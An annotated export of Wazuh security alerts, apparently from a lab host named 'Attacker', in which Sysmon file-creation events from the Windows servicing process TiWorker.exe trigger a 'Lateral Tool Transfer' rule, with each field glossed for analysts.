data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2613251Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260622 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.260
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-core-file-l2-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.260
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.260 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-core-file-l2-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.260 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see high-risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.710160 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2870179Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260632 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.286
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.284
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.286 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.713298 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.3162385Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260644 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.313
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-processenvironment-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.313
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-processenvironment-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.716444 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.3496143Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260657 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.348
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-shutdown-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.348
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.348 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-shutdown-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.348 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.719550 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.3842941Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260671 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.382
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-timezone-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.382
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.382 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-timezone-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.382 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 34 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.722656 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.4134132Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260684 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.412
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-math-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.412
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-math-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.412 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 35 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.725742 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.4327048Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260692 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.431
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-crt-utility-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.431
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.431 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-crt-utility-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.431 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
